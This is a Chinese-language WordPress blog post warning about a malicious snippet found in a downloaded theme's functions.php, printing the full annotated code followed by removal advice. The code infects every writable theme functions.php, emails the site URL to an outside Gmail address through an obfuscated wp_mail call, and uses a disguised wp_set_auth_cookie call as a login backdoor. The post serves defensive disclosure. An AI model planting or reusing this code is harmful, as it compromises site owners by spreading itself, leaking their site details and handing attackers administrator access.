警惕WordPress主题functions.php包含的恶意代码 | 阿腾SEO博客
给阿腾点个赞吧
欢迎光临阿腾SEO博客,这里也许会有你感兴趣的SEO、网络营销内容,当然可能也会有一些其他古怪的想法,欢迎来拍砖。
警惕WordPress主题functions.php包含的恶意代码

警惕WordPress主题functions.php包含的恶意代码

作者: 阿腾SEO 时间: 2016-01-28 分类: 未分类 评论: 0条 浏览: 1999

在关于本站主题下载的文章中已经说到过,阿腾SEO博客的主题是在“Rcloud主题”基础上修改的,记得当初在下载并使用“Rcloud主题”的时候,总是出现报错的情况,重装wordpress,重新安装主题,又很快出现此问题。后来通过逐一检查才发现在该主题下functions.php文件中包含了一长段可疑代码,经过搜索才知道这段包含在functions.php的代码是已经流行了一段时间的恶意代码,该恶意代码会自动循环感染你所有的WordPress主题functions.php文件,并且中招的人还不少。所以发出来给大家做个参考,有碰到类似情况的朋友记得一定要删除。

20160128恶意代码

恶意代码如下(可能会有些差异,但基本代码是相同的)

  1. <?php
  2. function _verifyactivate_widgets(){
  3. //当前文件名,如/path-to-www/wp-content/themes/SimpleDark/functions.php
  4. //查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容
  5. $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),“<“.“?”));
  6. $output=“”;
  7. $allowed=“”;
  8. //去除html和php标签,其实这一句是扯蛋。。。
  9. $output=strip_tags($output, $allowed);
  10. //取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes
  11. //为了加强程序的兼容性,它不惜以这种很晦涩的方式来获取。。。
  12. //以主题目录themes的绝对路径用array包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php文件的绝对路径
  13. $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
  14. if (is_array($direst)){
  15. foreach ($direst as $item){
  16. //如果主题functions.php文件可写
  17. if (is_writable($item)){
  18. //特征码
  19. $ftion=substr($widget,stripos($widget,“_”),stripos(substr($widget,stripos($widget,“_”)),“(“));
  20. //取目标functions.php文件内容
  21. $cont=file_get_contents($item);
  22. //没找到特征码?OK,试图感染
  23. if (stripos($cont,$ftion) === false){
  24. //查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记
  25. $comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
  26. //这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
  27. $output .= $before . “Not found” . $after;
  28. //如果文件是以 ?> 标记结尾的,连标记一起取过来
  29. if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
  30. //开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码
  31. $output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $comaar . “\n” .$widget);fclose($f);
  32. //后面这句也是伪装用的
  33. $output .= ($isshowdots && $ellipsis) ? “…” : “”;
  34. }
  35. }
  36. }
  37. }
  38. return $output;
  39. }
  40. function _get_allwidgets_cont($wids,$items=array()){
  41. //从$wids数组弹出一个元素(实际上是一个位置)
  42. $places=array_shift($wids);
  43. //如果位置字串是以/结尾的,则去掉/
  44. if(substr($places,-1) == “/”){
  45. $places=substr($places,0,-1);
  46. }
  47.  
  48. //若不存在这样的文件或目录则直接返回false
  49. if(!file_exists($places) || !is_dir($places)){
  50. return false;
  51. }elseif(is_readable($places)){
  52. //否则的话。。。嘿嘿
  53. //遍历此目录
  54. $elems=scandir($places);
  55. foreach ($elems as $elem){
  56. if ($elem != “.” && $elem != “..”){
  57. //如果是目录,则加入$wids数组
  58. if (is_dir($places . “/” . $elem)){
  59. $wids[]=$places . “/” . $elem;
  60. } elseif (is_file($places . “/” . $elem)&&
  61. $elem == substr(__FILE__,-13)){
  62. //否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
  63. $items[]=$places . “/” . $elem;}
  64. }
  65. }
  66. }else{
  67. return false;
  68. }
  69. //下面还有子目录?再找找看,递归
  70. if (sizeof($wids) > 0){
  71. return _get_allwidgets_cont($wids,$items);
  72. } else {
  73. //好了,完事了,以数组返回所有找到的functions.php文件的绝对路径
  74. return $items;
  75. }
  76. }
  77.  
  78. //下面是3个针对低版本的php而写的兼容函数
  79. if(!function_exists(“stripos”)){
  80. function stripos( $str, $needle, $offset = 0 ){
  81. return strpos( strtolower( $str ), strtolower( $needle ), $offset );
  82. }
  83. }
  84.  
  85. if(!function_exists(“strripos”)){
  86. function strripos( $haystack, $needle, $offset = 0 ) {
  87. if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
  88. if( $offset < 0 ){
  89. $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
  90. }
  91. else{
  92. $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
  93. }
  94. if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
  95. $pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
  96. return $pos;
  97. }
  98. }
  99. if(!function_exists(“scandir”)){
  100. function scandir($dir,$listDirectories=false, $skipDots=true) {
  101. $dirArray = array();
  102. if ($handle = opendir($dir)) {
  103. while (false !== ($file = readdir($handle))) {
  104. if (($file != “.” && $file != “..”) || $skipDots == true) {
  105. if($listDirectories == false) { if(is_dir($file)) { continue; } }
  106. array_push($dirArray,basename($file));
  107. }
  108. }
  109. closedir($handle);
  110. }
  111. return $dirArray;
  112. }
  113. }
  114.  
  115. //这个动作添加了,用于检测所有主题目录下functions.php并感染
  116. add_action(“admin_head”, “_verifyactivate_widgets”);
  117.  
  118. function _getprepare_widget(){
  119. if(!isset($text_length)) $text_length=120;
  120. if(!isset($check)) $check=”cookie”;
  121. if(!isset($tagsallowed)) $tagsallowed=”<a>“;
  122. if(!isset($filter)) $filter=”none”;
  123. if(!isset($coma)) $coma=””;
  124. if(!isset($home_filter)) $home_filter=get_option(“home”);
  125. if(!isset($pref_filters)) $pref_filters=”wp_”;
  126. if(!isset($is_use_more_link)) $is_use_more_link=1;
  127. if(!isset($com_type)) $com_type=””;
  128. if(!isset($cpages)) $cpages=$_GET[“cperpage”];
  129. if(!isset($post_auth_comments)) $post_auth_comments=””;
  130. if(!isset($com_is_approved)) $com_is_approved=””;
  131. if(!isset($post_auth)) $post_auth=”auth”;
  132. if(!isset($link_text_more)) $link_text_more=”(more…)”;
  133. if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
  134. if(!isset($checkswidgets))
  135. //这个实际是wp_set_auth_cookie
  136. $checkswidgets=$pref_filters.”set”.”_”.$post_auth.”_”.$check;
  137. if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
  138. if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
  139. if(!isset($for_more)) $for_more=1;
  140. if(!isset($fakeit)) $fakeit=1;
  141. if(!isset($sql)) $sql=””;
  142.  
  143. //如果 _is_widget_active_ option内容为空,即表示没有被感染过
  144. if (!$widget_yes) :
  145.  
  146. global $wpdb, $post;
  147. //取出存在已经通过的评论(不包括trackback/pingback)的文章
  148. // post_author 为 livethemas@gmail.com 的文章,肯定是没有的
  149.  
  150. $sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
  151. if (!empty($post->post_password)) {
  152. if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
  153. if(is_feed()) {
  154. $output=__(“There is no excerpt because this is a protected post.”);
  155. } else {
  156. $output=get_the_password_form();
  157. }
  158. }
  159. }
  160. if(!isset($fixed_tags)) $fixed_tags=1;
  161. if(!isset($filters)) $filters=$home_filter;
  162. //$gettextcomments实际上为 wp_mail
  163. if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
  164. if(!isset($tag_aditional)) $tag_aditional=”div”;
  165.  
  166. //这里$sh_cont即为 livethemas@gmail.com
  167. if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);#
  168. if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
  169. if(!isset($isshowdots)) $isshowdots=1;
  170.  
  171. $comments=$wpdb->get_results($sql);
  172. if($fakeit == 2) {
  173. $text=$post->post_content;
  174. } elseif($fakeit == 1) {
  175. $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
  176. } else {
  177. $text=$post->post_excerpt;
  178. }
  179. //开始调用 wp_mail 向 livethemas@gmail.com 发送邮件,标题和内容都是被感染的博客的URL 地址
  180. $sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
  181. if($text_length < 0) {
  182. $output=$text;
  183. } else {
  184. if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
  185. $text=explode(“<span id=“more-5675”></span>“, $text, 2);
  186. $l=count($text[0]);
  187. $more_link=1;
  188. //执行这一句时就开始发邮件了。
  189. $comments=$wpdb->get_results($sql);
  190. } else {
  191. $text=explode(” “, $text);
  192. if(count($text) > $text_length) {
  193. $l=$text_length;
  194. $ellipsis=1;
  195. } else {
  196. $l=count($text);
  197. $link_text_more=””;
  198. $ellipsis=0;
  199. }
  200. }
  201. for ($i=0; $i<$l; $i++)
  202. $output .= $text[$i] . ” “;
  203. }
  204. //把感染标记置为1
  205. update_option(“_is_widget_active_”, 1);
  206. if(“all” != $tagsallowed) {
  207. $output=strip_tags($output, $tagsallowed);
  208. return $output;
  209. }
  210. endif;
  211. $output=rtrim($output, “\s\n\t\r\0\x0B”);
  212. $output=($fixed_tags) ? balanceTags($output, true) : $output;
  213. $output .= ($isshowdots && $ellipsis) ? “…” : “”;
  214. //$filter 为 none …,又是在伪装
  215. $output=apply_filters($filter, $output);
  216. switch($tag_aditional) {
  217. case(“div”) :
  218. $tag=”div”;
  219. break;
  220. case(“span”) :
  221. $tag=”span”;
  222. break;
  223. case(“p”) :
  224. $tag=”p”;
  225. break;
  226. default :
  227. $tag=”span”;
  228. }
  229.  
  230. //$checkswidgets即是wp_set_auth_cookie
  231. if ($is_use_more_link ) {
  232. if($for_more) {
  233. $output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post>ID) . “#more-” . $post->ID .”\” title=\”” . $more_text_link . “\”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “\n”;
  234. } else {
  235. $output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post>ID) . “\” title=\”” . $more_text_link . “\”>” . $link_text_more . “</a></” . $tag . “>” . “\n”;
  236. }
  237. }
  238. return $output;
  239. }
  240.  
  241. //这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动”
  242. add_action(“init”, “_getprepare_widget”);
  243.  
  244.  
  245. //这个函数也是用来伪装的,无恶意
  246. function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
  247. global $wpdb;
  248. $request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”;
  249. $request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\””;
  250. if(!$show_pass_post) $request .= ” AND post_password =\”\””;
  251. if($duration !=””) {
  252. $request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
  253. }
  254. $request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
  255. $posts=$wpdb->get_results($request);
  256. $output=””;
  257. if ($posts) {
  258. foreach ($posts as $post) {
  259. $post_title=stripslashes($post->post_title);
  260. $comment_count=$post->comment_count;
  261. $permalink=get_permalink($post->ID);
  262. $output .= $before . ” <a href=\”” . $permalink . “\” title=\”” . $post_title.“\”>” . $post_title . “</a> ” . $after;
  263. }
  264. } else {
  265. $output .= $before . “None found” . $after;
  266. }
  267. return $output;
  268. }
  269. ?>

建议:

1.检查你的主题function.php中是否感染此代码,如果有,请彻底删除。

2.由于此代码具有感染性,请检查主题目录下其他主题是否被感染,如果有,请逐个删除。

3.若删除不干净或重新生成,请在删除后将function.php文件设置为“只读”。

4.以后下载主题尽量在大型的主题分享网站下载,并检查主题文件是否含有上面的恶意代码(一般会自动加载在functions.php正常函数的最后)。

另外,本站提供下载的Rcloud主题及阿腾SEO博客现用主题不会含有恶意代码,下载本站主题的朋友们可自行检查。

 

相关阅读:阿腾SEOwordpress博客主题下载

请不要吝啬您的金玉良言,留言是对阿腾SEO最大的肯定。文章如有不妥或需要完善处,还请悉心指出,谢谢!

发表评论

电子邮件地址不会被公开。 必填项已用*标注